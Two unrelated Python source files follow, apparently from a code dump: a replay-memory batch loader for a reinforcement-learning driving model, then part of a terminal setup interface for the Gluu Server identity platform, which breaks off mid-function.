self.is_reverse = is_reverse
self.steering_wheel = steering_wheel
self.steering_wheel_raw = steering_wheel_raw
self.previous_states_distances = previous_states_distances
@property
def batch_size(self):
return self.images_by_timestep.shape[1]
@property
def nb_future(self):
return self.images_prev_by_timestep.shape[0] - 1
@property
def nb_prev_per_image(self):
return self.images_prev_by_timestep.shape[2]
def reward_bin_idx(self, timestep, inbatch_idx):
timestep = self.curr_idx + timestep
reward = self.rewards[timestep, inbatch_idx]
reward_norm = (reward - Config.MIN_REWARD) / (Config.MAX_REWARD - Config.MIN_REWARD)
reward_norm = 1 - reward_norm # top to bottom
rewbin = np.clip(int(reward_norm * NB_REWARD_BINS), 0, NB_REWARD_BINS-1) # clip here, because MAX_REWARD ends up giving bin NB_REWARD_BINS, which is 1 too high
return rewbin
def rewards_bins(self, timestep):
timestep = self.curr_idx + timestep
T, B = self.rewards.shape
result = np.zeros((B, NB_REWARD_BINS), dtype=np.float32)
for b in xrange(B):
rewbin = self.reward_bin_idx(timestep-self.curr_idx, b)
result[b, rewbin] = 1
return result
def rewards_bins_all(self):
T, B = self.rewards.shape
bins_over_time = [self.rewards_bins(t) for t in xrange(-self.curr_idx, T-self.curr_idx)]
return np.array(bins_over_time, dtype=np.float32)
def inputs_supervised(self, volatile=False, requires_grad=True, gpu=GPU):
images = to_cuda(to_variable(self.images_by_timestep[0], volatile=volatile, requires_grad=requires_grad), gpu)
images_prev = to_cuda(to_variable(self.images_prev_by_timestep[0], volatile=volatile, requires_grad=requires_grad), gpu)
return images, images_prev
def inputs_reinforced_add_numpy(self, timestep=0):
timestep = self.curr_idx + timestep
B = self.batch_size
prev_indices_exclusive = [timestep - d for d in self.previous_states_distances]
prev_indices_inclusive = [timestep] + prev_indices_exclusive
ma_vecs = np.zeros((self.batch_size, len(prev_indices_exclusive), 9), dtype=np.float32)
for i, idx in enumerate(prev_indices_exclusive):
mas = self.multiactions[idx]
for b, ma in enumerate(mas):
ma_vecs[b, i, :] = actionslib.ACTIONS_TO_MULTIVEC[ma]
ma_vecs = ma_vecs.reshape(self.batch_size, -1) # (B, P*9) with P=number of previous images
speeds = self.speeds[prev_indices_inclusive, :]
steering_wheel = (self.steering_wheel[prev_indices_inclusive, :] - Config.STEERING_WHEEL_CNN_MIN) / (Config.STEERING_WHEEL_CNN_MAX - Config.STEERING_WHEEL_CNN_MIN)
steering_wheel_raw = (self.steering_wheel_raw[prev_indices_inclusive, :] - Config.STEERING_WHEEL_RAW_CNN_MIN) / (Config.STEERING_WHEEL_RAW_CNN_MAX - Config.STEERING_WHEEL_RAW_CNN_MIN)
vals = {
"speeds": np.squeeze(np.clip(speeds / Config.MAX_SPEED, 0, 1)),
"is_reverse": np.squeeze(self.is_reverse[prev_indices_inclusive, :]),
"steering_wheel": np.squeeze(steering_wheel*2 - 1),
"steering_wheel_raw": np.squeeze(steering_wheel_raw*2 - 1),
"multiactions_vecs": ma_vecs
}
if B == 1:
vals["speeds"] = vals["speeds"][:, np.newaxis]
vals["is_reverse"] = vals["is_reverse"][:, np.newaxis]
vals["steering_wheel"] = vals["steering_wheel"][:, np.newaxis]
vals["steering_wheel_raw"] = vals["steering_wheel_raw"][:, np.newaxis]
vals["speeds"] = vals["speeds"].transpose((1, 0)) # (P, B) => (B, P) with P=number of previous images
vals["is_reverse"] = vals["is_reverse"].transpose((1, 0)) # (P, B) => (B, P) with P=number of previous images
vals["steering_wheel"] = vals["steering_wheel"].transpose((1, 0)) # (P, B) => (B, P) with P=number of previous images
vals["steering_wheel_raw"] = vals["steering_wheel_raw"].transpose((1, 0)) # (P, B) => (B, P) with P=number of previous images
return vals
def inputs_reinforced_add(self, volatile=False, requires_grad=True, gpu=GPU):
return to_cuda(to_variable(self.inputs_reinforced_add_numpy(), volatile=volatile, requires_grad=requires_grad), gpu)
def future_inputs_supervised(self, volatile=False, requires_grad=True, gpu=GPU):
images = to_cuda(to_variable(self.images_by_timestep[1:], volatile=volatile, requires_grad=requires_grad), gpu)
images_prev = to_cuda(to_variable(self.images_prev_by_timestep[1:], volatile=volatile, requires_grad=requires_grad), gpu)
return images, images_prev
def future_reinforced_add(self, volatile=False, requires_grad=True, gpu=GPU):
vals = {
"speeds": [],
"is_reverse": [],
"steering_wheel": [],
"steering_wheel_raw": [],
"multiactions_vecs": []
}
for timestep in xrange(1, self.nb_future+1):
inputs_ts = self.inputs_reinforced_add_numpy(timestep=timestep)
vals["speeds"].append(inputs_ts["speeds"])
vals["is_reverse"].append(inputs_ts["is_reverse"])
vals["steering_wheel"].append(inputs_ts["steering_wheel"])
vals["steering_wheel_raw"].append(inputs_ts["steering_wheel_raw"])
vals["multiactions_vecs"].append(inputs_ts["multiactions_vecs"])
vals["speeds"] = np.array(vals["speeds"], dtype=np.float32)
vals["is_reverse"] = np.array(vals["is_reverse"], dtype=np.float32)
vals["steering_wheel"] = np.array(vals["steering_wheel"], dtype=np.float32)
vals["steering_wheel_raw"] = np.array(vals["steering_wheel_raw"], dtype=np.float32)
vals["multiactions_vecs"] = np.array(vals["multiactions_vecs"], dtype=np.float32)
T, B, _ = vals["speeds"].shape
vals_flat = {
"speeds": vals["speeds"].reshape((T*B, -1)),
"is_reverse": vals["is_reverse"].reshape((T*B, -1)),
"steering_wheel": vals["steering_wheel"].reshape((T*B, -1)),
"steering_wheel_raw": vals["steering_wheel_raw"].reshape((T*B, -1)),
"multiactions_vecs": vals["multiactions_vecs"].reshape((T*B, -1))
}
return to_cuda(to_variable(vals_flat, volatile=volatile, requires_grad=requires_grad), gpu)
def inputs_successor_multiactions_vecs(self, volatile=False, requires_grad=True, gpu=GPU):
# the successor gets in actions a and has to predict the next
# state, i.e. for tuples (s, a, r, s') it gets a and predicts s',
# hence the future actions here start at curr_idx (current state index)
# and end at -1
arr = models_reinforced.SuccessorPredictor.multiactions_to_vecs(self.multiactions[self.curr_idx:-1])
assert arr.shape == (self.nb_future, self.batch_size, 9)
return to_cuda(to_variable(arr, volatile=volatile, requires_grad=requires_grad), gpu)
def direct_rewards_values(self, volatile=False, requires_grad=True, gpu=GPU):
rews = self.rewards[self.curr_idx, :][:,np.newaxis]
rews = np.tile(rews, (1, 9))
return to_cuda(to_variable(rews, volatile=volatile, requires_grad=requires_grad), gpu)
def future_direct_rewards_values(self, volatile=False, requires_grad=True, gpu=GPU):
rews = self.rewards[self.curr_idx+1:, :][:, :, np.newaxis]
rews = np.tile(rews, (1, 1, 9))
return to_cuda(to_variable(rews, volatile=volatile, requires_grad=requires_grad), gpu)
def outputs_dr_gt(self, volatile=False, requires_grad=True, gpu=GPU):
# for a tuple (s, a, r, s'), the reward r is what has to be predicted,
# i.e. the reward for the previous action, which depends on the new
# state s' that the action created; it is stored at the previous
# timestep (state s), hence the -1 here
bins = self.rewards_bins(-1)
return to_cuda(to_variable(bins, volatile=volatile, requires_grad=requires_grad), gpu)
def outputs_dr_future_gt(self, volatile=False, requires_grad=True, gpu=GPU):
# starting at curr_idx and ending at -1 here for the same reason
# as above
bins = self.rewards_bins_all()
bins = bins[self.curr_idx:-1]
return to_cuda(to_variable(bins, volatile=volatile, requires_grad=requires_grad), gpu)
def outputs_ae_gt(self, volatile=False, requires_grad=True, gpu=GPU):
imgs = self.images_by_timestep[0, ...]
imgs = np.clip(imgs*255, 0, 255).astype(np.uint8).transpose((0, 2, 3, 1))
imgs_rs = ia.imresize_many_images(imgs, (45, 80))
imgs_rs = (imgs_rs / 255.0).astype(np.float32).transpose((0, 3, 1, 2))
return to_cuda(to_variable(imgs_rs, volatile=volatile, requires_grad=requires_grad), gpu)
def chosen_action_indices(self):
mas_timestep = self.multiactions[self.curr_idx]
indices = [np.argmax(actionslib.ACTIONS_TO_MULTIVEC[ma]) for ma in mas_timestep]
return indices
def chosen_action_indices_future(self):
indices_by_timestep = []
for t_idx in xrange(self.nb_future):
mas_timestep = self.multiactions[t_idx]
indices = [np.argmax(actionslib.ACTIONS_TO_MULTIVEC[ma]) for ma in mas_timestep]
indices_by_timestep.append(indices)
return indices_by_timestep
def draw(self, timestep=0, inbatch_idx=0):
timestep = self.curr_idx + timestep
img = self.images_by_timestep[timestep-self.curr_idx, inbatch_idx, :, :, :]
img = (img.transpose((1, 2, 0))*255).astype(np.uint8)
imgs_prev = self.images_prev_by_timestep[timestep-self.curr_idx, inbatch_idx, :, :, :]
imgs_prev = (imgs_prev.transpose((1, 2, 0))*255).astype(np.uint8)
h, w = img.shape[0:2]
imgs_viz = [img] + [np.tile(imgs_prev[..., i][:, :, np.newaxis], (1, 1, 3)) for i in xrange(imgs_prev.shape[2])]
imgs_viz = [ia.imresize_single_image(im, (h, w), interpolation="cubic") for im in imgs_viz]
imgs_viz = np.hstack(imgs_viz)
rewards_bins = self.rewards_bins_all()
mas = [self.multiactions[i][inbatch_idx] for i in xrange(timestep-self.nb_prev_per_image, timestep)]
pos = [timestep] + [timestep-d for d in self.previous_states_distances]
reinforced_add = self.inputs_reinforced_add_numpy(timestep=timestep-self.curr_idx)
outputs_dr_gt = self.outputs_dr_gt()[inbatch_idx]
texts = [
"pos: " + " ".join([str(i) for i in pos]),
"Rewards: " + " ".join(["%.2f" % (self.rewards[i, inbatch_idx],) for i in pos]),
"Rewards bins: " + " ".join(["%d" % (np.argmax(rewards_bins[i, inbatch_idx]),) for i in pos]),
"Speeds: " + " ".join(["%.2f" % (self.speeds[i, inbatch_idx],) for i in pos]),
"Multiactions: " + " ".join(["%s%s" % (ma[0], ma[1]) for ma in mas]),
"Speeds RA: " + " ".join(["%.3f" % (reinforced_add["speeds"][inbatch_idx, i],) for i in xrange(reinforced_add["speeds"].shape[1])]),
"outputs_dr_gt[t=-1]: " + "%d" % (np.argmax(to_numpy(outputs_dr_gt)),)
]
texts = "\n".join(texts)
result = np.zeros((imgs_viz.shape[0]*3, imgs_viz.shape[1], 3), dtype=np.uint8)
util.draw_image(result, x=0, y=0, other_img=imgs_viz, copy=False)
result = util.draw_text(result, x=0, y=imgs_viz.shape[0]+4, text=texts, size=9)
return result
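# A minimal standalone sketch (not part of the training pipeline) of the
# reward-binning scheme used by BatchData.reward_bin_idx() above: the reward
# is normalized to [0, 1], flipped so that high rewards land in low bin
# indices, then clipped into NB_REWARD_BINS discrete bins. The min/max
# defaults below are placeholders; the real values come from
# Config.MIN_REWARD and Config.MAX_REWARD.
def _reward_to_bin_sketch(reward, min_reward=-1.0, max_reward=1.0, nb_bins=NB_REWARD_BINS):
    reward_norm = (reward - min_reward) / (max_reward - min_reward)
    reward_norm = 1 - reward_norm  # invert: best reward -> bin 0
    return int(np.clip(int(reward_norm * nb_bins), 0, nb_bins - 1))
# e.g. with the placeholder range, reward=max_reward maps to bin 0 and
# reward=min_reward maps to bin NB_REWARD_BINS-1.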
def states_to_batch(previous_states_list, states_list, augseq, previous_states_distances, model_height, model_width, model_prev_height, model_prev_width):
"""Convert multiple chains of states into a batch.
Parameters
----------
previous_states_list : list of list of State
Per chain of states a list of the previous states.
First index of the list is the batch index,
second index is the timestep. The oldest states come first.
states_list : list of list of State
Per chain of states a list of states that contain the "current"
state at the start, followed by future states.
First index is batch index, second timestep.
augseq : Augmenter
Sequence of augmenters to apply to each image. Use Noop() to make
no changes.
previous_states_distances : list of int
List of distances relative to the current state. Each distance
refers to one previous state to add to the model input.
E.g. [2, 1] adds the state 200ms and 100ms before the current "state".
model_height : int
Height of the model input images (current state).
model_width : int
Width of the model input images (current state).
model_prev_height : int
Height of the model input images (previous states).
model_prev_width : int
Width of the model input images (previous states).
Returns
----------
List of BatchData
"""
assert isinstance(previous_states_list, list)
assert isinstance(states_list, list)
assert isinstance(previous_states_list[0], list)
assert isinstance(states_list[0], list)
assert len(previous_states_list) == len(states_list)
B = len(states_list)
H, W = model_height, model_width
Hp, Wp = model_prev_height, model_prev_width
nb_prev_load = max(previous_states_distances)
nb_future_states = len(states_list[0]) - 1
nb_timesteps = nb_prev_load + 1 + nb_future_states
#images = np.zeros((nb_timesteps, B, H, W, 3), dtype=np.uint8)
#images_gray = np.zeros((nb_timesteps, B, Hp, Wp), dtype=np.float32)
images_by_timestep = np.zeros((1+nb_future_states, B, H, W, 3), dtype=np.float32)
images_gray = np.zeros((nb_timesteps, B, Hp, Wp), dtype=np.float32)
multiactions = [[] for i in xrange(nb_timesteps)]
rewards = np.zeros((nb_timesteps, B), dtype=np.float32)
speeds = np.zeros((nb_timesteps, B), dtype=np.float32)
is_reverse = np.zeros((nb_timesteps, B), dtype=np.float32)
steering_wheel = np.zeros((nb_timesteps, B), dtype=np.float32)
steering_wheel_raw = np.zeros((nb_timesteps, B), dtype=np.float32)
augseqs_det = [augseq.to_deterministic() for _ in xrange(len(states_list))]
for b, (previous_states, states) in enumerate(zip(previous_states_list, states_list)):
augseq_det = augseqs_det[b]
all_states = previous_states + states
for t, state in enumerate(all_states):
imgy = cv2.cvtColor(state.screenshot_rs, cv2.COLOR_RGB2GRAY)
imgy_rs = downscale(imgy, Hp, Wp)
imgy_rs_aug = augseq_det.augment_image(imgy_rs)
images_gray[t, b, ...] = imgy_rs_aug  # store the augmented grayscale frame computed above
multiactions[t].append(state.multiaction)
rewards[t, b] = state.reward
if state.speed is not None:
speeds[t, b] = state.speed
if state.is_reverse is not None:
is_reverse[t, b] = int(state.is_reverse)
if state.steering_wheel_cnn is not None:
steering_wheel[t, b] = state.steering_wheel_cnn
if state.steering_wheel_raw_cnn is not None:
steering_wheel_raw[t, b] = state.steering_wheel_raw_cnn
images_gray = images_gray[..., np.newaxis]
for b, states in enumerate(states_list):
augseq_det = augseqs_det[b]
for i, state in enumerate(states):
images_by_timestep[i, b, ...] = augseq_det.augment_image(downscale(state.screenshot_rs, H, W))
nb_prev_per_img = len(previous_states_distances)
images_prev_by_timestep = np.zeros((1+nb_future_states, B, Hp, Wp, nb_prev_per_img), dtype=np.float32)
for t in xrange(1 + nb_future_states):
indices = [nb_prev_load+t-d for d in previous_states_distances]
prev = images_gray[indices]
prev = prev.transpose((1, 2, 3, 4, 0)).reshape((B, Hp, Wp, nb_prev_per_img))
images_prev_by_timestep[t] = prev
images_by_timestep = (images_by_timestep.astype(np.float32) / 255.0).transpose((0, 1, 4, 2, 3))
images_prev_by_timestep = (images_prev_by_timestep.astype(np.float32) / 255.0).transpose((0, 1, 4, 2, 3))
return BatchData(nb_prev_load, images_by_timestep, images_prev_by_timestep, multiactions, rewards, speeds, is_reverse, steering_wheel, steering_wheel_raw, previous_states_distances)
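# Shapes produced by states_to_batch (with F = number of future states and
# P = len(previous_states_distances)):
#   images_by_timestep:      (1+F, B, 3, H, W)    float32, scaled to [0, 1]
#   images_prev_by_timestep: (1+F, B, P, Hp, Wp)  float32, scaled to [0, 1]
#   rewards/speeds/is_reverse/steering_wheel(_raw): (nb_prev_load+1+F, B) float32
#   multiactions: list of length nb_prev_load+1+F, each a list of B multiactions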
def downscale(im, h, w):
if im.ndim == 2:
im = im[:, :, np.newaxis]
return np.squeeze(ia.imresize_single_image(im, (h, w), interpolation="cubic"))
else:
return ia.imresize_single_image(im, (h, w), interpolation="cubic")
class BatchLoader(object):
"""Class to load batches from the replay memory."""
def __init__(self, val, batch_size, augseq, previous_states_distances, nb_future_states, model_height, model_width, model_prev_height, model_prev_width):
self.val = val
self.batch_size = batch_size
self.augseq = augseq.deepcopy()
self.augseq.reseed(random.randint(0, 10**6))
self.previous_states_distances = previous_states_distances
self.nb_future_states = nb_future_states
self.model_height = model_height
self.model_width = model_width
self.model_prev_height = model_prev_height
self.model_prev_width = model_prev_width
self._memory = None
def load_random_batch(self):
if self._memory is None:
self._memory = replay_memory.ReplayMemory.create_instance_reinforced(val=self.val)
self._memory.update_caches()
print("Connected memory to %s, idmin=%d, idmax=%d" % ("val" if self.val else "train", self._memory.id_min, self._memory.id_max))
memory = self._memory
nb_prev = max(self.previous_states_distances)
nb_timesteps = nb_prev + 1 + self.nb_future_states
previous_states_list = []
states_list = []
for b in xrange(self.batch_size):
statechain = memory.get_random_state_chain(nb_timesteps)
previous_states_list.append(statechain[:nb_prev])
states_list.append(statechain[nb_prev:])
return states_to_batch(previous_states_list, states_list, self.augseq, self.previous_states_distances, self.model_height, self.model_width, self.model_prev_height, self.model_prev_width)
class BackgroundBatchLoader(object):
"""Class that takes a BatchLoader and executes it many times in background
processes."""
def __init__(self, batch_loader, queue_size, nb_workers, threaded=False):
self.queue = multiprocessing.Queue(queue_size)
self.workers = []
self.exit_signal = multiprocessing.Event()
for i in range(nb_workers):
seed = random.randint(1, 10**6)
if threaded:
worker = threading.Thread(target=self._load_batches, args=(batch_loader, self.queue, self.exit_signal, None))
else:
worker = multiprocessing.Process(target=self._load_batches, args=(batch_loader, self.queue, self.exit_signal, seed))
worker.daemon = True
worker.start()
self.workers.append(worker)
def get_batch(self):
return pickle.loads(self.queue.get())
def _load_batches(self, batch_loader, queue, exit_signal, seed=None):
if seed is not None:
random.seed(seed)
np.random.seed(seed)
batch_loader.augseq.reseed(seed)
ia.seed(seed)
while not exit_signal.is_set():
batch = batch_loader.load_random_batch()
start_time = time.time()
batch_str = pickle.dumps(batch, protocol=-1)
added_to_queue = False # without this, it will add the batch countless times to the queue
while not added_to_queue and not exit_signal.is_set():
try:
queue.put(batch_str, timeout=1)
added_to_queue = True
except QueueFull as e:
pass
end_time = time.time()
batch_loader._memory.close()
def join(self):
self.exit_signal.set()
time.sleep(5)
while not self.queue.empty():
_ = self.queue.get()
#self.queue.join()
for worker in self.workers:
#worker.join()
worker.terminate()
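# A minimal usage sketch for the background loader above (assumes the replay
# memory is already populated; construction of the BatchLoader mirrors the
# __main__ block below). Batches are pickled by the workers and unpickled in
# get_batch(), so only picklable data crosses the process boundary.
def _background_loader_example(batch_loader, nb_batches=10):
    bg = BackgroundBatchLoader(batch_loader, queue_size=8, nb_workers=2)
    try:
        return [bg.get_batch() for _ in xrange(nb_batches)]
    finally:
        bg.join()  # signal workers to exit, drain the queue and terminate them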
if __name__ == "__main__":
from scipy import misc
from imgaug import augmenters as iaa
MODEL_HEIGHT = 90
MODEL_WIDTH = 160
MODEL_PREV_HEIGHT = 45
MODEL_PREV_WIDTH = 80
loader = BatchLoader(
val=False, batch_size=8, augseq=iaa.Noop(),
previous_states_distances=[2, 4, 6, 8, 10],
nb_future_states=10,
model_height=MODEL_HEIGHT, model_width=MODEL_WIDTH,
model_prev_height=MODEL_PREV_HEIGHT, model_prev_width=MODEL_PREV_WIDTH
)
for _ in xrange(1000):
for t in xrange(3):
imgs = []
for b in xrange(3):
print(t, b)
batch = loader.load_random_batch()
imgs.append(batch.draw(timestep=t, inbatch_idx=b))
misc.imshow(np.vstack(imgs))
|
tui.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import time
import random
import textwrap
import re
import socket
import curses
import string
import inspect
import threading
import math
import pymysql
import json
# for putty connections we need the following env
os.environ['NCURSES_NO_UTF8_ACS'] = "1"
from setup_app.messages import msg
from setup_app.config import Config
from setup_app import static
from setup_app.utils import base
from setup_app.utils.properties_utils import propertiesUtils
from setup_app.utils.progress import gluuProgress
from setup_app.utils.spanner import Spanner
import npyscreen
random_marketing_strings = [
'Having trouble? Open a ticket: https://support.gluu.org',
'Need to cluster? Consider moving to Kubernetes with Gluu Cloud Native Edition.',
"What is oxd? It's an API that developers use to obtain OAuth tokens or to use OpenID Connect authentication.",
'Super Gluu is a free mobile 2FA application that uses push notifications and FIDO authentication https://super.gluu.org',
'Gluu Casa enables end users to manage their 2FA credentials https://casa.gluu.org',
"Interested in VIP support? Schedule a Zoom meeting https://www.gluu.org/booking",
"Gluu Cloud Native Edition (CN) uses Kubernetes, Helm and other tools to enable efficient ways to scale.",
'Interested in Open Source software business models? Listen to Open Source Underdogs: https://opensourceunderdogs.com',
'Need to learn more about OpenID and SAML? Read "Securing the Perimeter" by Gluu CEO Mike Schwartz: https://gluu.co/book',
'The Gluu Server is one of the most advanced OpenID Providers. Compare at https://openid.net/certification',
'Installing the Gluu Server is a SNAP. Search for Gluu on https://snapcraft.io',
'Gluu Solo is coming soon. This is a hosted CE offering with 99.95% availability.',
'Need FIPS 140-2? Consider the new Gluu Server RHEL 8.4 FIPS distribution that leverages central crypto policies',
'Open Banking security is available with our new Gluu Server profile. See https://gluu.org/openbanking/',
"Gluu's core software now lives at the Linux Foundation Janssen Project. See https://github.com/JanssenProject",
'FIDO 2 is now a standalone service in the Gluu Server. The latest MacBook and iPhone devices support FIDO 2',
'One Time Password (OTP) is available out-of-the-box with the Gluu Server and Casa',
"Passwordless authentication flows enable you to improve your organization's security posture",
'Gluu supports many databases: LDAP, Couchbase, RDBMS and Google Spanner',
'OpenID is more modern and more secure than SAML; deprecate older protocols like CAS or WS-Fed',
'SCIM enables you to add, edit, delete and search users via a JSON/REST API',
'Social Login is supported with passport-js. There are hundreds of strategies available',
'Inbound SAML enables you to act as a SAML SP if your partners or customers have their own SAML IDP',
]
marketing_text_period = 15
def getClassName(c):
try:
return getattr(c, '__class__').__name__
except:
return ''
class GluuSetupApp(npyscreen.StandardApp):
do_installation = None
exit_reason = str()
my_counter = 0
do_notify = True
installed_instance = None
jettyInstaller = None
setup_loaded = {}
def onStart(self):
if Config.installed_instance:
self.addForm('MAIN', ServicesForm, name=msg.MAIN_label)
elif self.setup_loaded:
self.addForm('MAIN', DisplaySummaryForm, name=msg.DisplaySummaryForm_label)
else:
self.addForm('MAIN', MAIN, name=msg.ServicesForm_label)
self.addForm('ServicesForm', ServicesForm, name=msg.ServicesForm_label)
for obj in list(globals().items()):
if not obj[0] in ('MAIN', 'GluuSetupForm', 'ServicesForm') and obj[0].endswith('Form') and inspect.isclass(obj[1]):
self.addForm(obj[0], obj[1], name=getattr(msg, obj[0]+'_label'))
def onCleanExit(self):
if self.do_notify:
npyscreen.notify_wait("setup.py will exit in a moment. " + self.exit_reason, title="Warning!")
class GluuSetupForm(npyscreen.FormBaseNew):
def beforeEditing(self):
self.parentApp.my_counter = 0
self.add_handlers({curses.KEY_F1: self.display_help})
self.marketing_label = self.add(npyscreen.MultiLineEdit, value='', max_height=1, rely=self.lines-3, editable=False)
form_name = getClassName(self)
self.add(npyscreen.TitleFixedText, name=msg.version_label + ' ' + Config.oxVersion, rely=self.lines-5, editable=False, labelColor='CONTROL')
self.add(npyscreen.MultiLineEdit, value='=' * (self.columns - 4), max_height=1, rely=self.lines-4, editable=False)
if form_name != 'InstallStepsForm':
next_x = 20 if form_name == 'MAIN' or (Config.installed_instance and form_name == 'ServicesForm') else 28
self.button_next = self.add(npyscreen.ButtonPress, name="Next", when_pressed_function=self.nextButtonPressed, rely=self.lines-5, relx=self.columns - next_x)
if next_x == 28:
self.button_back = self.add(npyscreen.ButtonPress, name="Back", when_pressed_function=self.backButtonPressed, rely=self.lines-5, relx=self.columns - 20)
self.button_quit = self.add(npyscreen.ButtonPress, name="Quit", when_pressed_function=self.quitButtonPressed, rely=self.lines-5, relx=self.columns - 12)
if hasattr(self, 'do_beforeEditing'):
self.do_beforeEditing()
def while_waiting(self):
if self.parentApp.my_counter % marketing_text_period == 0:
self.marketing_label.value = random.choice(random_marketing_strings)
self.marketing_label.update()
self.parentApp.my_counter += 1
if hasattr(self, 'do_while_waiting'):
self.do_while_waiting()
def quitButtonPressed(self):
notify_result = npyscreen.notify_ok_cancel("Are you sure you want to quit?", title='Warning')
if notify_result:
self.parentApp.exit_reason = msg.not_to_continue
self.parentApp.switchForm(None)
def display_help(self, code_of_key_pressed):
class_name = self.__class__.__name__
if hasattr(msg, class_name+'Help'):
help_text = getattr(msg, class_name+'Help')
else:
help_text = msg.no_help
npyscreen.notify_confirm(help_text, title="Help", wide=True)
class MAIN(GluuSetupForm):
def create(self):
desc_wrap = textwrap.wrap(msg.decription, self.columns - 6)
self.description_label = self.add(npyscreen.MultiLineEdit, value='\n'.join(desc_wrap), max_height=6, rely=2, editable=False)
self.description_label.autowrap = True
os_string = "{} {} {}".format('snap' if base.snap else '', base.os_type, base.os_version).strip()
self.os_type = self.add(npyscreen.TitleFixedText, name=msg.os_type_label, begin_entry_at=18, value=os_string, editable=False)
self.init_type = self.add(npyscreen.TitleFixedText, name=msg.init_type_label, begin_entry_at=18, value=base.os_initdaemon, editable=False)
self.httpd_type = self.add(npyscreen.TitleFixedText, name=msg.httpd_type_label, begin_entry_at=18, value=base.httpd_name, field_width=40, editable=False)
self.license_confirm = self.add(npyscreen.Checkbox, scroll_exit=True, name=msg.acknowledge_lisence)
self.warning_text = self.add(npyscreen.MultiLineEdit, value=msg.setup_properties_warning, max_height=4, editable=False)
for sys_req in ('file_max', 'mem_size', 'number_of_cpu', 'free_disk_space'):
cur_val = getattr(base, 'current_' + sys_req)
req_val = static.suggested_mem_size if sys_req == 'mem_size' else getattr(msg, 'suggested_' + sys_req)
if cur_val < req_val:
warning_text = getattr(msg, 'insufficient_' + sys_req).format(cur_val, req_val)
if sys_req == 'file_max':
self.parentApp.exit_reason = warning_text
self.parentApp.onCleanExit()
time.sleep(3.5)
sys.exit(False)
warning_text += '. Do you want to continue?'
result = npyscreen.notify_yes_no(warning_text, title="Warning")
if not result:
self.parentApp.exit_reason = msg.not_to_continue
self.parentApp.onCleanExit()
sys.exit(False)
def nextButtonPressed(self):
if not self.license_confirm.value:
npyscreen.notify_confirm(msg.acknowledge_lisence_ask, title="Info")
return
self.parentApp.switchForm("HostForm")
def on_cancel(self):
self.title.value = "Hello World!"
def resize(self):
self.button_quit.rely = self.lines-5
self.button_quit.relx = self.columns-12
self.warning_text.rely = self.columns - 8
self.button_next.rely = self.lines-5
self.button_next.relx = self.columns-20
class HostForm(GluuSetupForm):
myfields_ = ('ip', 'hostname', 'city', 'state', 'orgName', 'admin_email', 'countryCode', 'application_max_ram', 'oxtrust_admin_password')
def create(self):
self.add(npyscreen.FixedText, value=make_title(msg.cert_info_label), editable=False)
self.ip = self.add(npyscreen.TitleText, name=msg.ip_label, begin_entry_at=25)
self.hostname = self.add(npyscreen.TitleText, name=msg.hostname_label, begin_entry_at=25)
self.orgName = self.add(npyscreen.TitleText, name=msg.orgName_label, begin_entry_at=25)
self.admin_email = self.add(npyscreen.TitleText, name=msg.admin_email_label, begin_entry_at=25)
self.city = self.add(npyscreen.TitleText, name=msg.city_label, begin_entry_at=25)
self.state = self.add(npyscreen.TitleText, name=msg.state_label, begin_entry_at=25)
self.countryCode = self.add(npyscreen.TitleText, name=msg.countryCode_label, begin_entry_at=25)
self.add(npyscreen.FixedText, value=make_title(msg.sys_info_label), rely=12, editable=False)
self.application_max_ram = self.add(npyscreen.TitleText, name=msg.application_max_ram_label, begin_entry_at=25)
self.oxtrust_admin_password = self.add(npyscreen.TitleText, name=msg.oxtrust_admin_password_label, begin_entry_at=25)
def nextButtonPressed(self):
if not self.hostname.value:
npyscreen.notify_confirm(msg.enter_hostname, title="Info")
return
if self.hostname.value.lower() == 'localhost':
npyscreen.notify_confirm(msg.enter_hostname_local, title="Info")
return
if not propertiesUtils.check_email(self.admin_email.value):
npyscreen.notify_confirm(msg.enter_valid_email, title="Info")
return
if not propertiesUtils.isIP(self.ip.value):
npyscreen.notify_confirm(msg.enter_valid_ip, title="Info")
return
if len(self.countryCode.value) != 2:
npyscreen.notify_confirm(msg.enter_valid_countryCode, title="Info")
return
if len(self.city.value) < 2:
npyscreen.notify_confirm(msg.enter_valid_city, title="Info")
return
if len(self.oxtrust_admin_password.value) < 6:
npyscreen.notify_confirm(msg.oxtrust_admin_password_warning, title="Info")
return
try:
int(self.application_max_ram.value)
except:
npyscreen.notify_confirm(msg.max_ram_int_warning, title="Info")
return
for k in self.myfields_:
f = getattr(self, k)
setattr(Config, k, f.value)
Config.application_max_ram = int(self.application_max_ram.value)
self.parentApp.switchForm('ServicesForm')
def do_beforeEditing(self):
if not Config.hostname:
Config.hostname = self.parentApp.jettyInstaller.detect_hostname()
for k in self.myfields_:
f = getattr(self, k)
v = Config.get(k,'')
if v:
f.value = str(v)
f.update()
def backButtonPressed(self):
self.parentApp.switchForm('MAIN')
class ServicesForm(GluuSetupForm):
services_before_this_form = []
if os.environ.get('GLUU_SERVICES'):
services = os.environ['GLUU_SERVICES'].split()
else:
services = ('installHttpd', 'installSaml',
'installPassport', 'installGluuRadius', 'installOxd',
'installCasa', 'installScimServer', 'installFido2',
)
def create(self):
for service in self.services:
cb = self.add(npyscreen.Checkbox, scroll_exit=True, name = getattr(msg, 'ask_' + service))
setattr(self, service, cb)
self.oxd_url = self.add(npyscreen.TitleText, name=msg.oxd_url_label, rely=12, begin_entry_at=17, hidden=True)
self.installCasa.value_changed_callback = self.casa_oxd_option_changed
self.installOxd.value_changed_callback = self.casa_oxd_option_changed
def do_beforeEditing(self):
for service in self.services:
if Config.get(service):
cb = getattr(self, service)
cb.value = True
if Config.installed_instance:
cb.editable = False
self.services_before_this_form.append(service)
cb.update()
if Config.installed_instance and 'installCasa' in self.services_before_this_form:
self.oxd_url.hidden = True
self.oxd_url.update()
def nextButtonPressed(self):
for service in self.services:
cb_val = getattr(self, service).value
if cb_val and Config.installed_instance and not Config.get(service):
Config.addPostSetupService.append(service)
setattr(Config, service, cb_val)
if cb_val and service in Config.non_setup_properties['service_enable_dict']:
for attribute in Config.non_setup_properties['service_enable_dict'][service]:
setattr(Config, attribute, 'true')
if Config.installed_instance and not Config.addPostSetupService:
exit_result = npyscreen.notify_yes_no(
msg.exit_post_setup,
title="Warning"
)
if exit_result:
sys.exit(False)
else:
return
if 'installSaml' in self.services and self.installSaml.value:
Config.shibboleth_version = 'v3'
if self.installOxd.value:
Config.oxd_server_https = 'https://{}:8443'.format(Config.hostname)
if self.installCasa.value:
if not self.installOxd.value and not self.oxd_url.value:
npyscreen.notify_confirm(msg.install_oxd_or_url_warning, title="Warning")
return
if not self.installOxd.value:
oxd_server_https = self.oxd_url.value
